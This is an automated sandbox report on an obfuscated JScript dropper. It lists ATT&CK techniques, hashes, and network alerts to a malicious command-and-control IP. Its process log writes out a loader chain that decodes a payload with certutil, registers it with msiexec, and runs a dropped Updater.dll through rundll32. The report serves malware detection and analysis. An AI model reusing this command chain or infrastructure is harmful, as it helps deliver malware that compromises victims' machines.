| Credentials | Domains | Default Accounts | 12 Native API | 2 Scheduled Task/Job | 2 Scheduled Task/Job | 11 Process Injection | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Data Encoding | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 System Owner/User Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 15 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Source | Detection | Scanner | Label
l.js | 2% | Virustotal |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://149.248.58.85/d | 0% | Avira URL Cloud | safe
https://149.248.58.85/Q | 0% | Avira URL Cloud | safe
https://149.248.58.85/ | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://149.248.58.85/d | rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://149.248.58.85/Q | rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://149.248.58.85/ | rundll32.exe, 0000000B.00000002.2988366410.000002A92B877000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2988366410.000002A92B8CF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.248.58.85 | unknown | United States | 20473 | AS-CHOOPAUS | true
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1596998
Start date and time:2025-01-22 20:36:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 46s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (Javascript)
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:l.js
Detection:MAL
Classification:mal72.evad.winJS@8/4@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 11
  • Number of non-executed functions: 27
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:38:56 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
19:37:26 | Task Scheduler | Run new task: {65430329-E14B-45C7-815F-1545FB9EBEE9} path: certutil s>-decode radEBB74.tmp rad64802.tmp
19:37:27 | Task Scheduler | Run new task: {D7AC511B-6643-49BE-900E-4E0C51F57196} path: msiexec s>/y C:\Users\user\AppData\Local\Temp\rad64802.tmp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.248.58.85 | rad59AD5.dll | malicious | Unknown |
149.248.58.85 | rad59AD5.dll | malicious | Unknown |
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-CHOOPAUS | rad59AD5.dll | malicious | Unknown | 149.248.58.85
AS-CHOOPAUS | rad59AD5.dll | malicious | Unknown | 149.248.58.85
AS-CHOOPAUS | http://jlolaw.com | malicious | CAPTCHA Scam ClickFix | 137.220.56.63
AS-CHOOPAUS | ti.co.exe | malicious | I2PRAT | 216.128.184.123
AS-CHOOPAUS | lolz.exe | malicious | Xmrig | 192.248.189.11
AS-CHOOPAUS | codes.js | malicious | AgentTesla | 45.63.94.214
AS-CHOOPAUS | http://rock.levie.com.vn | malicious | Unknown | 45.63.66.114
AS-CHOOPAUS | 154.213.189.141-x86-2025-01-21T03_19_07.elf | malicious | Mirai, Moobot | 44.169.217.192
AS-CHOOPAUS | Setup (1).exe | malicious | Unknown | 207.246.91.177
AS-CHOOPAUS | https://sjsenersol.ae/clone/house | malicious | Unknown | 199.247.13.246
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\ProgramData\Whitefusion\Updater.dll | rad59AD5.dll | malicious | Unknown |
C:\ProgramData\Whitefusion\Updater.dll | rad59AD5.dll | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\rad64802.tmp | rad59AD5.dll | malicious | Unknown |
C:\Users\user\AppData\Local\Temp\rad64802.tmp | rad59AD5.dll | malicious | Unknown |
              Process:C:\Windows\System32\msiexec.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):54784
              Entropy (8bit):5.985188109464102
              Encrypted:false
              SSDEEP:768:g9QHl5zJLsXpwnPA9KYMGZC7SNichPH/kGFyHxr6a6GPxxoqMo5ydqP+qL3i3:g2dJn7dSfjof2Jo5PM
              MD5:1A28984D6DB3ABDB967C0C19B56F887D
              SHA1:B815A93DEDD5575A77B5FA9C0D77A9BC783CDB27
              SHA-256:B2B67092D3978B0A199C949591BB1872CBC49B91494726A513BE407ABC2CA6A9
              SHA-512:63E255C48E9C36485E6E7BC31319FD407027829713CEF93DD61EDF132949CE3C2DE741A70F6BA90347E3D0AA7112ACC95B71A7405711EAB925F5A491CD5D513F
              Malicious:false
              Joe Sandbox View:
• Filename: rad59AD5.dll, Detection: malicious
• Filename: rad59AD5.dll, Detection: malicious
              Reputation:low
              Process:C:\Windows\System32\certutil.exe
              File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):54784
              Entropy (8bit):5.985188109464102
              Encrypted:false
              SSDEEP:768:g9QHl5zJLsXpwnPA9KYMGZC7SNichPH/kGFyHxr6a6GPxxoqMo5ydqP+qL3i3:g2dJn7dSfjof2Jo5PM
              MD5:1A28984D6DB3ABDB967C0C19B56F887D
              SHA1:B815A93DEDD5575A77B5FA9C0D77A9BC783CDB27
              SHA-256:B2B67092D3978B0A199C949591BB1872CBC49B91494726A513BE407ABC2CA6A9
              SHA-512:63E255C48E9C36485E6E7BC31319FD407027829713CEF93DD61EDF132949CE3C2DE741A70F6BA90347E3D0AA7112ACC95B71A7405711EAB925F5A491CD5D513F
              Malicious:false
              Joe Sandbox View:
• Filename: rad59AD5.dll, Detection: malicious
• Filename: rad59AD5.dll, Detection: malicious
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):73050
              Entropy (8bit):5.011733028274136
              Encrypted:false
              SSDEEP:1536:3Twk8+rj5v4umMEhe3seHLLDiSY2H7Rkqy1w0nIp:3TDrjx4pMHLPi6kqyap
              MD5:76E5A2CAD9CC7F4D716F68BCB952B068
              SHA1:0A249123C5F2C6F49CD7E650323E9EADB19F7E07
              SHA-256:E4E8AD7DA6AEDB908E277C4E5EE733C9E29ACD2268AAF91D1341EEB55B3FB806
              SHA-512:6AD6910D26EFA258FAEEDC03DF2B9DF4F295294BE66A9701C577F107E975D8A00022C89F95F986E1AA85BCFDAD0D8EE6FAAD32E17701CE56B59542642925EE78
              Malicious:false
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):338
              Entropy (8bit):3.5661224775561378
              Encrypted:false
              SSDEEP:6:BID0ka/82On+SkSJkJAWhAlAtWlubhEZykMLNAJDiAjgsW2YRZuy0laMn1:aAkahO+fTWlj0b53LNyuAjzvYRQVaM1
              MD5:BE64DBE6683DD2D86EE6381A3BC11334
              SHA1:930F37A99F1B632681A3134948641ED89A992623
              SHA-256:8E0792206591911D6A8C256699EC6E4E782DAC194F0BCA62E6886547E4365400
              SHA-512:FAA4848F6F92678444DBA13D0862C1DBAA0DA0A03500A458C804589F2A0A707D805FD93C8E7B8204A128C0110CD93527F09641B5DCC70D94AB4D159346223162
              Malicious:false
              Preview:.....D<..|.K.d.....YF. .....<... .....\.......... ....................!.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.r.u.n.d.l.l.3.2...e.x.e...2.".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.W.h.i.t.e.f.u.s.i.o.n.\.U.p.d.a.t.e.r...d.l.l.".,.S.t.a.r.t. ./.u.......J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................(.............................
              File type:ASCII text
              Entropy (8bit):4.80598489458784
              TrID:
                File name:l.js
                File size:764'959 bytes
                MD5:97835729c58cae6501e9b3a3776e9906
                SHA1:63012f62e00a491b83adaba8804d890ac809490a
                SHA256:a75cab3593ad35620817235a9bd7938c7adaa8b3ce12a2da20e3e145ac304346
                SHA512:0ed5d7c90dbb260a732dd990d40a69f0997f8390db0a4cecc18349965e052e13ff8f5ecb709b95b176cc7e3686fbb08775e4b97b2253aa7aef9a1212607e8964
                SSDEEP:12288:q/VoiDR8Cx2ouvoqEZTwXasSNKF+uV6VBEx2:q/Vok2tI+w
                TLSH:C9F45770075218403322DF56EE1DA0E09E29055BBB74A986F98C5B74AFDE4BDDBB0C78
                File Content Preview:function a0_0x174c(_0xe060d2, _0x2b858b) {. var _0x1a48d6 = a0_0x1a48();. return a0_0x174c = function (_0x174c06, _0x33a01f) {. _0x174c06 = _0x174c06 - 0x116;. var _0x2ba6ab = _0x1a48d6[_0x174c06];. return _0x2ba6ab;. }, a0_0
                Icon Hash:68d69b8bb6aa9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-22T20:37:06.102276+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 50003 | 149.248.58.85 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 22, 2025 20:38:59.154711008 CET | 50003 | 443 | 192.168.2.4 | 149.248.58.85
Jan 22, 2025 20:38:59.154758930 CET | 443 | 50003 | 149.248.58.85 | 192.168.2.4
Jan 22, 2025 20:38:59.154926062 CET | 50003 | 443 | 192.168.2.4 | 149.248.58.85
Jan 22, 2025 20:38:59.167773008 CET | 50003 | 443 | 192.168.2.4 | 149.248.58.85
Jan 22, 2025 20:38:59.167819977 CET | 443 | 50003 | 149.248.58.85 | 192.168.2.4
                Target ID:0
                Start time:14:37:03
                Start date:22/01/2025
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\l.js"
                Imagebase:0x7ff72c760000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:14:37:27
                Start date:22/01/2025
                Path:C:\Windows\System32\certutil.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
                Imagebase:0x7ff660b40000
                File size:1'651'712 bytes
                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:5
                Start time:14:37:27
                Start date:22/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:14:37:27
                Start date:22/01/2025
                Path:C:\Windows\System32\msiexec.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
                Imagebase:0x7ff741380000
                File size:69'632 bytes
                MD5 hash:E5DA170027542E25EDE42FC54C929077
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:14:38:26
                Start date:22/01/2025
                Path:C:\Windows\System32\certutil.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\certutil.EXE -decode radEBB74.tmp rad64802.tmp
                Imagebase:0x7ff660b40000
                File size:1'651'712 bytes
                MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:9
                Start time:14:38:26
                Start date:22/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:14:38:56
                Start date:22/01/2025
                Path:C:\Windows\System32\msiexec.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\msiexec.EXE /y C:\Users\user\AppData\Local\Temp\rad64802.tmp
                Imagebase:0x7ff741380000
                File size:69'632 bytes
                MD5 hash:E5DA170027542E25EDE42FC54C929077
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:14:38:58
                Start date:22/01/2025
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\rundll32.exe "C:\ProgramData\Whitefusion\Updater.dll",Start /u
                Imagebase:0x7ff6c7700000
                File size:71'680 bytes
                MD5 hash:EF3179D498793BF4234F708D3BE28633
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false


                  Execution Graph

                  Execution Coverage:10.5%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:23.1%
                  Total number of Nodes:1462
                  Total number of Limit Nodes:35
GetTickCount QueryPerformanceCounter 4488->4490 4489->4485 4491 68b87e6b 4490->4491 4491->4485 4494 68b887bf 4492->4494 4493 68b81388 4494->4493 4498 68b88d50 4494->4498 4496 68b887e7 4496->4493 4497 68b88895 RtlAddFunctionTable 4496->4497 4497->4493 4500 68b88d60 4498->4500 4499 68b88dce 4499->4496 4500->4499 4501 68b88db9 strncmp 4500->4501 4501->4499 4501->4500 4502 68b88b50 4503 68b88b70 EnterCriticalSection 4502->4503 4504 68b88b61 4502->4504 4505 68b88bb3 LeaveCriticalSection 4503->4505 4506 68b88b89 4503->4506 4506->4505 4507 68b88bae free 4506->4507 4507->4505 4508 68b84c53 4517 68b833dd 4508->4517 4511 68b84ce6 4512 68b81df0 35 API calls 4513 68b84cd1 4512->4513 4514 68b84cde 4513->4514 4526 68b857e2 GetProcessHeap HeapFree 4513->4526 4527 68b857e2 GetProcessHeap HeapFree 4514->4527 4528 68b82f56 4517->4528 4520 68b834ad 4520->4511 4520->4512 4522 68b83426 4523 68b8342e memcpy 4522->4523 4525 68b8348d 4522->4525 4523->4525 4577 68b857e2 GetProcessHeap HeapFree 4525->4577 4526->4514 4527->4511 4529 68b86645 2 API calls 4528->4529 4530 68b82f7d RegOpenKeyExW 4529->4530 4531 68b833be 4530->4531 4532 68b82fb6 4530->4532 4533 68b866cc 2 API calls 4531->4533 4578 68b85790 GetProcessHeap HeapAlloc 4532->4578 4535 68b833c6 4533->4535 4535->4520 4576 68b85790 GetProcessHeap HeapAlloc 4535->4576 4536 68b82fc0 4537 68b833b0 RegCloseKey 4536->4537 4538 68b86645 2 API calls 4536->4538 4537->4531 4539 68b82fdb 4538->4539 4540 68b86645 2 API calls 4539->4540 4541 68b82fea 4540->4541 4542 68b86645 2 API calls 4541->4542 4543 68b82ffb 4542->4543 4544 68b865c0 2 API calls 4543->4544 4545 68b8300c 4544->4545 4546 68b865c0 2 API calls 4545->4546 4553 68b8301d 4546->4553 4547 68b83150 RegEnumKeyExW 4548 68b8319d RegOpenKeyExW 4547->4548 4549 68b8335e 4547->4549 4550 68b831cd RegQueryValueExW 4548->4550 4548->4553 4551 68b866cc 2 API calls 4549->4551 4552 68b8313f RegCloseKey 4550->4552 4550->4553 4554 68b8338a 4551->4554 4552->4553 4553->4547 4553->4552 4558 68b83299 
RegQueryValueExW 4553->4558 4560 68b8303f strcat 4553->4560 4562 68b83286 strcat 4553->4562 4564 68b8305e strcat 4553->4564 4567 68b8306b RegQueryValueExW 4553->4567 4568 68b8330e strcat 4553->4568 4570 68b83346 strcat 4553->4570 4571 68b823de WideCharToMultiByte WideCharToMultiByte GetProcessHeap HeapAlloc 4553->4571 4573 68b830d8 strcat 4553->4573 4574 68b83110 strcat 4553->4574 4555 68b866cc 2 API calls 4554->4555 4556 68b83394 4555->4556 4557 68b866cc 2 API calls 4556->4557 4559 68b8339e 4557->4559 4558->4553 4561 68b866cc 2 API calls 4559->4561 4560->4553 4563 68b833a8 4561->4563 4580 68b857e2 GetProcessHeap HeapFree 4562->4580 4566 68b866cc 2 API calls 4563->4566 4564->4567 4566->4537 4567->4553 4569 68b83125 strcat strcat 4567->4569 4568->4553 4569->4552 4581 68b857e2 GetProcessHeap HeapFree 4570->4581 4571->4553 4573->4553 4579 68b857e2 GetProcessHeap HeapFree 4574->4579 4576->4522 4577->4520 4578->4536 4579->4553 4580->4558 4581->4553 4582 68b85054 4585 68b846ae 4582->4585 4586 68b86645 2 API calls 4585->4586 4587 68b846c9 LoadLibraryW 4586->4587 4588 68b866cc 2 API calls 4587->4588 4589 68b846e0 4588->4589 4590 68b865c0 2 API calls 4589->4590 4591 68b846ec GetProcAddress 4590->4591 4592 68b866cc 2 API calls 4591->4592 4593 68b84709 4592->4593 4594 68b865c0 2 API calls 4593->4594 4595 68b84715 GetProcAddress 4594->4595 4596 68b866cc 2 API calls 4595->4596 4597 68b8472b 4596->4597 4598 68b865c0 2 API calls 4597->4598 4599 68b84737 GetProcAddress 4598->4599 4600 68b866cc 2 API calls 4599->4600 4601 68b8474d 4600->4601 4602 68b845e3 20 API calls 4601->4602 4603 68b84752 GetModuleFileNameW 4602->4603 4604 68b84780 4603->4604 4605 68b86645 2 API calls 4604->4605 4606 68b8478c 4605->4606 4607 68b866cc 2 API calls 4606->4607 4608 68b847a8 DeleteFileW 4607->4608 4609 68b847b9 4608->4609 2949 68b81200 2950 68b81280 2949->2950 2951 68b81222 2949->2951 2973 68b88300 2950->2973 2953 68b8125d 2951->2953 2955 68b88300 18 API calls 2951->2955 2954 68b81285 2956 68b81308 
2954->2956 2957 68b81298 2954->2957 2958 68b81231 2955->2958 2960 68b81418 224 API calls 2956->2960 2999 68b81010 2957->2999 2961 68b81418 224 API calls 2958->2961 2962 68b8123e 2960->2962 2961->2962 2962->2953 2964 68b81010 5 API calls 2962->2964 2963 68b8129d 2963->2953 2965 68b8132c 2963->2965 2966 68b812bc 2963->2966 2972 68b812e5 2963->2972 2964->2953 2967 68b81418 224 API calls 2965->2967 3013 68b81418 2966->3013 2967->2953 2968 68b81010 5 API calls 2968->2953 2971 68b81418 224 API calls 2971->2972 2972->2953 2972->2968 2974 68b88322 2973->2974 2980 68b88338 2973->2980 2974->2954 2975 68b88570 2975->2974 2976 68b8856a 2975->2976 2976->2975 2978 68b880f0 14 API calls 2976->2978 2981 68b885bc 2976->2981 2977 68b884fe 2977->2981 3017 68b880f0 2977->3017 2978->2976 2979 68b885d8 2982 68b88080 14 API calls 2979->2982 2980->2974 2980->2975 2980->2977 2980->2979 2991 68b883e0 2980->2991 3053 68b88080 2981->3053 2986 68b885e4 2982->2986 2983 68b88538 2987 68b880f0 14 API calls 2983->2987 2988 68b8866b 2986->2988 2989 68b88700 2986->2989 2997 68b88608 2986->2997 2987->2976 2993 68b88682 signal 2988->2993 2988->2997 2995 68b88790 signal 2989->2995 2989->2997 2990 68b880f0 14 API calls 2990->2991 2991->2977 2991->2981 2991->2983 2991->2990 2992 68b88490 2991->2992 2994 68b88486 2991->2994 2992->2974 2998 68b884c2 VirtualProtect 2992->2998 2996 68b88750 signal 2993->2996 2993->2997 2994->2992 2995->2997 2996->2997 2997->2954 2998->2992 3000 68b81026 2999->3000 3004 68b810a0 2999->3004 3002 68b81090 3000->3002 3005 68b81058 Sleep 3000->3005 3006 68b8106f 3000->3006 3001 68b81158 3001->2963 3002->2963 3003 68b810ed 3011 68b811b0 _initterm 3003->3011 3012 68b8110b 3003->3012 3004->3001 3004->3003 3009 68b810d9 Sleep 3004->3009 3005->3000 3007 68b81170 3006->3007 3008 68b81081 _amsg_exit 3006->3008 3088 68b892c0 3007->3088 3008->3002 3009->3004 3011->3012 3012->2963 3014 68b8142b CreateThread 3013->3014 3015 68b812d1 3013->3015 3014->3015 3016 68b8145c CloseHandle 3014->3016 
3092 68b813d0 3014->3092 3015->2953 3015->2971 3016->3015 3018 68b88112 3017->3018 3031 68b88294 3017->3031 3019 68b8815b 3018->3019 3020 68b882d2 3018->3020 3023 68b881c0 3018->3023 3025 68b8817c VirtualQuery 3019->3025 3021 68b882e1 3020->3021 3022 68b88080 7 API calls 3020->3022 3024 68b88080 7 API calls 3021->3024 3022->3021 3023->2983 3045 68b882fc 3024->3045 3025->3021 3026 68b881a8 3025->3026 3026->3023 3027 68b88250 VirtualProtect 3026->3027 3027->3023 3029 68b88280 GetLastError 3027->3029 3028 68b88322 3028->2983 3030 68b88080 7 API calls 3029->3030 3030->3031 3031->2983 3032 68b884fe 3036 68b885bc 3032->3036 3040 68b880f0 7 API calls 3032->3040 3033 68b880f0 7 API calls 3035 68b8856a 3033->3035 3034 68b885d8 3037 68b88080 7 API calls 3034->3037 3035->3028 3035->3033 3035->3036 3039 68b88080 7 API calls 3036->3039 3041 68b885e4 3037->3041 3038 68b88538 3042 68b880f0 7 API calls 3038->3042 3039->3034 3040->3038 3043 68b8866b 3041->3043 3044 68b88700 3041->3044 3051 68b88608 3041->3051 3042->3035 3048 68b88682 signal 3043->3048 3043->3051 3049 68b88790 signal 3044->3049 3044->3051 3045->3028 3045->3032 3045->3034 3045->3035 3045->3036 3045->3038 3046 68b880f0 7 API calls 3045->3046 3047 68b88486 3045->3047 3046->3045 3047->3028 3052 68b884c2 VirtualProtect 3047->3052 3050 68b88750 signal 3048->3050 3048->3051 3049->3051 3050->3051 3051->2983 3052->3047 3054 68b880ad 3053->3054 3055 68b8815b 3054->3055 3056 68b882d2 3054->3056 3059 68b881c0 3054->3059 3061 68b8817c VirtualQuery 3055->3061 3057 68b882e1 3056->3057 3058 68b88080 7 API calls 3056->3058 3060 68b88080 7 API calls 3057->3060 3058->3057 3059->2979 3080 68b882fc 3060->3080 3061->3057 3062 68b881a8 3061->3062 3062->3059 3063 68b88250 VirtualProtect 3062->3063 3063->3059 3065 68b88280 GetLastError 3063->3065 3064 68b88322 3064->2979 3066 68b88080 7 API calls 3065->3066 3066->3059 3067 68b884fe 3071 68b885bc 3067->3071 3075 68b880f0 7 API calls 3067->3075 3068 68b880f0 7 API calls 3070 68b8856a 
3068->3070 3069 68b885d8 3072 68b88080 7 API calls 3069->3072 3070->3064 3070->3068 3070->3071 3074 68b88080 7 API calls 3071->3074 3076 68b885e4 3072->3076 3073 68b88538 3077 68b880f0 7 API calls 3073->3077 3074->3069 3075->3073 3078 68b8866b 3076->3078 3079 68b88700 3076->3079 3086 68b88608 3076->3086 3077->3070 3083 68b88682 signal 3078->3083 3078->3086 3084 68b88790 signal 3079->3084 3079->3086 3080->3064 3080->3067 3080->3069 3080->3070 3080->3071 3080->3073 3081 68b880f0 7 API calls 3080->3081 3082 68b88486 3080->3082 3081->3080 3082->3064 3087 68b884c2 VirtualProtect 3082->3087 3085 68b88750 signal 3083->3085 3083->3086 3084->3086 3085->3086 3086->2979 3087->3082 3091 68b892d5 3088->3091 3089 68b89326 3089->3002 3090 68b8931e free 3090->3089 3091->3089 3091->3090 3095 68b81cd0 3092->3095 3115 68b8199e 3095->3115 3102 68b81d02 3105 68b81c5d 8 API calls 3102->3105 3108 68b81d07 3105->3108 3106 68b81cec 3109 68b813d9 3106->3109 3134 68b81c5d 3106->3134 3111 68b81d11 3108->3111 3114 68b81beb 7 API calls 3108->3114 3110 68b81d33 3156 68b856d7 3110->3156 3111->3109 3112 68b856d7 196 API calls 3111->3112 3112->3109 3114->3111 3116 68b819de 3115->3116 3117 68b819b0 3115->3117 3233 68b86645 3116->3233 3119 68b819ba GetTempPathW 3117->3119 3127 68b81a05 3117->3127 3122 68b819d5 3119->3122 3123 68b81a37 3119->3123 3120 68b819ea LoadLibraryW 3236 68b866cc 3120->3236 3122->3106 3130 68b81a43 SHGetFolderPathW 3122->3130 3191 68b8179e 3123->3191 3125 68b81a13 GetProcAddress 3128 68b866cc 2 API calls 3125->3128 3127->3117 3240 68b865c0 3127->3240 3129 68b81a35 3128->3129 3129->3119 3131 68b81a7b 3130->3131 3132 68b81a83 3130->3132 3131->3106 3176 68b81a8f 3131->3176 3133 68b8179e 13 API calls 3132->3133 3133->3131 3135 68b86645 2 API calls 3134->3135 3136 68b81c6f GetModuleHandleW 3135->3136 3137 68b866cc 2 API calls 3136->3137 3138 68b81c86 3137->3138 3139 68b865c0 2 API calls 3138->3139 3140 68b81c92 GetProcAddress 3139->3140 3141 68b866cc 2 API calls 3140->3141 3142 
68b81cac 3141->3142 3143 68b81cb1 GetNativeSystemInfo 3142->3143 3144 68b81cc3 GetSystemInfo 3142->3144 3145 68b81cb8 3143->3145 3144->3145 3145->3102 3146 68b81beb 3145->3146 3147 68b86645 2 API calls 3146->3147 3148 68b81bfd GetModuleHandleW 3147->3148 3149 68b866cc 2 API calls 3148->3149 3150 68b81c14 3149->3150 3151 68b865c0 2 API calls 3150->3151 3152 68b81c20 GetProcAddress 3151->3152 3153 68b866cc 2 API calls 3152->3153 3154 68b81c3a GlobalMemoryStatusEx 3153->3154 3155 68b81c4d 3154->3155 3155->3102 3155->3110 3157 68b86645 2 API calls 3156->3157 3158 68b856f5 SetLastError CreateMutexW 3157->3158 3159 68b8571e GetLastError 3158->3159 3160 68b8573f 3158->3160 3161 68b8572b 3159->3161 3162 68b85751 3159->3162 3163 68b866cc 2 API calls 3160->3163 3247 68b85696 3161->3247 3164 68b86645 2 API calls 3162->3164 3166 68b85747 3163->3166 3167 68b8575d 3164->3167 3166->3109 3258 68b87b43 3167->3258 3168 68b85736 CloseHandle 3168->3160 3170 68b85768 3171 68b8576c 3170->3171 3172 68b85776 3170->3172 3173 68b866cc 2 API calls 3171->3173 3174 68b85696 192 API calls 3172->3174 3175 68b85774 3173->3175 3174->3171 3175->3168 3177 68b86645 2 API calls 3176->3177 3178 68b81aac RegOpenKeyExW 3177->3178 3179 68b81adb 3178->3179 3180 68b81afc 3178->3180 3181 68b866cc 2 API calls 3179->3181 3182 68b86645 2 API calls 3180->3182 3183 68b81ae8 3181->3183 3187 68b81b08 3182->3187 3183->3106 3184 68b81b64 RegEnumKeyExW 3185 68b81bd3 3184->3185 3186 68b81ba7 RegOpenKeyExW 3184->3186 3188 68b866cc 2 API calls 3185->3188 3186->3187 3187->3184 3190 68b81b27 RegQueryValueExW RegCloseKey 3187->3190 3189 68b81bdb RegCloseKey 3188->3189 3190->3187 3192 68b8186d 3191->3192 3193 68b817be 3191->3193 3194 68b86645 2 API calls 3192->3194 3195 68b81894 3193->3195 3196 68b817cc 3193->3196 3200 68b81879 LoadLibraryW 3194->3200 3195->3193 3199 68b865c0 2 API calls 3195->3199 3197 68b817da 3196->3197 3198 68b818cc 3196->3198 3202 68b817e8 3197->3202 3203 68b818fa 3197->3203 3205 68b865c0 2 API calls 
